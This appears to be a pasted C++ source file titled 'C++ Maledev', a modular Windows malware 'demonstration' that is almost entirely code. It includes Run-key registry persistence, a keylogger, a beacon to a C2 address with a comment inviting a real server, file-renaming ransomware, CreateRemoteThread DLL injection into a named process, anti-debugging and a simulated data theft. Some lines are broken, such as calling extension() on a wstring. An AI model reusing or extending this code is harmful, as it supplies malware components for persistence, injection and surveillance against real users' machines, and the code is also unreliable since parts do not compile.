C++ Maledev

1. #include <iostream>
2. #include <fstream>
3. #include <string>
4. #include <vector>
5. #include <windows.h>
6. #include <winreg.h>
7. #include <direct.h>
8. #include <filesystem>
9. #include <chrono>
10. #include <thread>
11. #include <winsock2.h>
12. #include <ws2tcpip.h>
13. #include <Psapi.h>
14. #include <TlHelp32.h>
15. #include <Shlwapi.h>
16. #include <Dbghelp.h>
17.  
18. #pragma comment(lib, "ws2_32.lib")
19. #pragma comment(lib, "Psapi.lib")
20. #pragma comment(lib, "Shlwapi.lib")
21. #pragma comment(lib, "Dbghelp.lib")
22.  
23. namespace fs = std::filesystem;
24.  
25. // Module: Persistence
26. class Persistence {
27. public:
28. static void establish() {
29. HKEY hKey;
30. std::wstring path = fs::current_path().wstring() + L"\\malware.exe";
31. if (RegOpenKeyEx(HKEY_CURRENT_USER, L"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", 0, KEY_SET_VALUE, &hKey) == ERROR_SUCCESS) {
32. RegSetValueEx(hKey, L"Malware", 0, REG_SZ, (BYTE*)path.c_str(), (DWORD)(path.length() + 1) * sizeof(wchar_t));
33. RegCloseKey(hKey);
34. std::wcout << L"[+] Persistence established" << std::endl;
35. } else {
36. std::wcout << L"[!] Failed to establish persistence" << std::endl;
37. }
38. }
39.  
40. static void remove() {
41. HKEY hKey;
42. if (RegOpenKeyEx(HKEY_CURRENT_USER, L"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", 0, KEY_SET_VALUE, &hKey) == ERROR_SUCCESS) {
43. RegDeleteValue(hKey, L"Malware");
44. RegCloseKey(hKey);
45. std::wcout << L"[+] Removed persistence" << std::endl;
46. }
47. }
48. };
49.  
50. // Module: File Infection
51. class FileInfection {
52. public:
53. static void infect() {
54. for (const auto & entry : fs::directory_iterator(fs::current_path())) {
55. if (entry.path().extension() == ".txt") {
56. std::wofstream file(entry.path(), std::ios::app);
57. if (file.is_open()) {
58. file << L"\n\n[Malicious payload: This file has been compromised]";
59. file.close();
60. std::wcout << L"[*] Infected file: " << entry.path().wstring() << std::endl;
61. }
62. }
63. }
64. }
65. };
66.  
67. // Module: Data Exfiltration
68. class DataExfiltration {
69. public:
70. static void exfiltrate(const fs::path& source, const fs::path& destination) {
71. if (fs::exists(source)) {
72. fs::copy_file(source, destination, fs::copy_options::overwrite_existing);
73. std::wcout << L"[+] Sensitive data exfiltrated to: " << destination.wstring() << std::endl;
74. } else {
75. std::wcout << L"[!] File for data exfiltration not found" << std::endl;
76. }
77. }
78. };
79.  
80. // Module: Keylogger
81. class Keylogger {
82. private:
83. std::wofstream logFile;
84.  
85. public:
86. Keylogger() {
87. logFile.open("keylog.txt", std::ios::app);
88. }
89.  
90. ~Keylogger() {
91. if (logFile.is_open()) logFile.close();
92. }
93.  
94. void start() {
95. if (logFile.is_open()) {
96. std::wcout << L"[+] Starting keylogger" << std::endl;
97. for(int i = 0; i < 100; ++i) { // Log 100 keystrokes for demo
98. if (_kbhit()) {
99. wchar_t key = _getwch();
100. if (key >= L'a' && key <= L'z') key = key - 32; // Convert to uppercase
101. logFile << key;
102. }
103. std::this_thread::sleep_for(std::chrono::milliseconds(100));
104. }
105. std::wcout << L"[+] Keylogger stopped" << std::endl;
106. } else {
107. std::wcout << L"[!] Failed to start keylogger" << std::endl;
108. }
109. }
110. };
111.  
112. // Module: C2 Communication
113. class C2Communication {
114. public:
115. static void communicate(const std::string& ipAddress, int port) {
116. WSADATA wsaData;
117. SOCKET ConnectSocket = INVALID_SOCKET;
118. struct sockaddr_in clientService;
119.  
120. if (WSAStartup(MAKEWORD(2,2), &wsaData) != 0) {
121. std::wcout << L"[!] Failed to initialize Winsock" << std::endl;
122. return;
123. }
124.  
125. ConnectSocket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
126. if (ConnectSocket == INVALID_SOCKET) {
127. std::wcout << L"[!] Error at socket()" << std::endl;
128. WSACleanup();
129. return;
130. }
131.  
132. clientService.sin_family = AF_INET;
133. clientService.sin_addr.s_addr = inet_addr(ipAddress.c_str());
134. clientService.sin_port = htons(port);
135.  
136. if (connect(ConnectSocket, (SOCKADDR*)&clientService, sizeof(clientService)) == SOCKET_ERROR) {
137. std::wcout << L"[!] Failed to connect to C2 server" << std::endl;
138. closesocket(ConnectSocket);
139. WSACleanup();
140. return;
141. }
142.  
143. const char* message = "Malware beacon";
144. send(ConnectSocket, message, strlen(message), 0);
145. std::wcout << L"[+] Beacon sent to C2 server" << std::endl;
146.  
147. closesocket(ConnectSocket);
148. WSACleanup();
149. }
150. };
151.  
152. // Module: Ransomware Simulation
153. class Ransomware {
154. public:
155. static void encryptFiles() {
156. for (const auto & entry : fs::directory_iterator(fs::current_path())) {
157. std::wstring ext = entry.path().wstring().extension();
158. if (ext == L".docx" || ext == L".pdf" || ext == L".txt") {
159. fs::path encryptedPath = entry.path().wstring() + L".encrypted";
160. fs::rename(entry.path(), encryptedPath);
161. std::wcout << L"[*] File encrypted: " << entry.path().wstring() << L" -> " << encryptedPath.wstring() << std::endl;
162. }
163. }
164. }
165.  
166. static void decryptFiles() {
167. for (const auto & entry : fs::directory_iterator(fs::current_path())) {
168. if (entry.path().extension() == ".encrypted") {
169. fs::path originalPath = entry.path().wstring().substr(0, entry.path().wstring().length() - 10); // remove .encrypted
170. fs::rename(entry.path(), originalPath);
171. std::wcout << L"[*] File decrypted for demo: " << entry.path().wstring() << std::endl;
172. }
173. }
174. }
175. };
176.  
177. // Module: Process Injection
178. class ProcessInjection {
179. public:
180. static void inject(const char* targetProcessName, const char* dllPath) {
181. HANDLE hProcess = NULL, hThread = NULL;
182. HMODULE hKernel32 = GetModuleHandleA("kernel32.dll");
183. LPVOID pLoadLibrary = (LPVOID)GetProcAddress(hKernel32, "LoadLibraryA");
184.  
185. PROCESSENTRY32 pe32;
186. pe32.dwSize = sizeof(PROCESSENTRY32);
187.  
188. HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
189. if (hSnapshot == INVALID_HANDLE_VALUE) return;
190.  
191. if (Process32First(hSnapshot, &pe32)) {
192. do {
193. if (strcmp(pe32.szExeFile, targetProcessName) == 0) {
194. hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pe32.th32ProcessID);
195. if (hProcess) {
196. LPVOID pRemoteString = VirtualAllocEx(hProcess, NULL, strlen(dllPath) + 1, MEM_COMMIT, PAGE_READWRITE);
197. if (pRemoteString) {
198. WriteProcessMemory(hProcess, pRemoteString, (LPVOID)dllPath, strlen(dllPath) + 1, NULL);
199.  
200. hThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)pLoadLibrary, pRemoteString, 0, NULL);
201. if (hThread) {
202. WaitForSingleObject(hThread, INFINITE);
203. VirtualFreeEx(hProcess, pRemoteString, 0, MEM_RELEASE);
204. }
205. }
206. CloseHandle(hProcess);
207. }
208. break;
209. }
210. } while (Process32Next(hSnapshot, &pe32));
211. }
212. CloseHandle(hSnapshot);
213. if (hThread) CloseHandle(hThread);
214. std::wcout << L"[+] DLL injected into " << targetProcessName << std::endl;
215. }
216. };
217.  
218. // Module: Anti-Debugging
219. class AntiDebugging {
220. public:
221. static bool isDebuggerPresent() {
222. return IsDebuggerPresent();
223. }
224.  
225. static void checkForDebuggers() {
226. if (isDebuggerPresent()) {
227. std::wcout << L"[!] Debugger detected, exiting..." << std::endl;
228. exit(1);
229. }
230. }
231.  
232. static void antiDebuggingLoop() {
233. while (true) {
234. checkForDebuggers();
235. Sleep(1000); // Check every second
236. }
237. }
238. };
239.  
240. // Module: Privilege Escalation Check
241. class PrivilegeEscalation {
242. public:
243. static bool isAdmin() {
244. BOOL isAdmin = FALSE;
245. PSID AdministratorsGroup;
246. SID_IDENTIFIER_AUTHORITY NtAuthority = SECURITY_NT_AUTHORITY;
247. if (AllocateAndInitializeSid(&NtAuthority, 2, SECURITY_BUILTIN_DOMAIN_RID, DOMAIN_ALIAS_RID_ADMINS, 0, 0, 0, 0, 0, 0, &AdministratorsGroup)) {
248. CheckTokenMembership(NULL, AdministratorsGroup, &isAdmin);
249. FreeSid(AdministratorsGroup);
250. }
251. return isAdmin;
252. }
253. };
254.  
255. int main() {
256. std::wcout << L"[!] Running Malware Demonstration" << std::endl;
257.  
258. // Check for admin rights
259. if (PrivilegeEscalation::isAdmin()) {
260. std::wcout << L"[+] Running with admin rights" << std::endl;
261. } else {
262. std::wcout << L"[+] Running without admin rights" << std::endl;
263. }
264.  
265. // Anti-Debugging
266. std::thread antiDebugThread(AntiDebugging::antiDebuggingLoop);
267. antiDebugThread.detach();
268.  
269. // Persistence
270. Persistence::establish();
271.  
272. // File Infection
273. FileInfection::infect();
274.  
275. // Data Exfiltration
276. DataExfiltration::exfiltrate("sensitive_data.txt", "C:\\temp\\stolen_data.txt");
277.  
278. // Keylogger
279. Keylogger keylogger;
280. keylogger.start();
281.  
282. // C2 Communication
283. C2Communication::communicate("127.0.0.1", 4444); // Replace with actual C2 server for real-world use
284.  
285. // Ransomware
286. Ransomware::encryptFiles();
287.  
288. // Process Injection (Demo with notepad, replace with actual process name in real scenarios)
289. ProcessInjection::inject("notepad.exe", "C:\\path\\to\\your\\dll.dll"); // Path to a DLL for demonstration
290.  
291. // Clean up
292. Persistence::remove();
293. Ransomware::decryptFiles();
294. fs::remove(L"C:\\temp\\stolen_data.txt");
295. std::wcout << L"[+] Cleaned up operations" << std::endl;
296.  
297. return 0;
298. }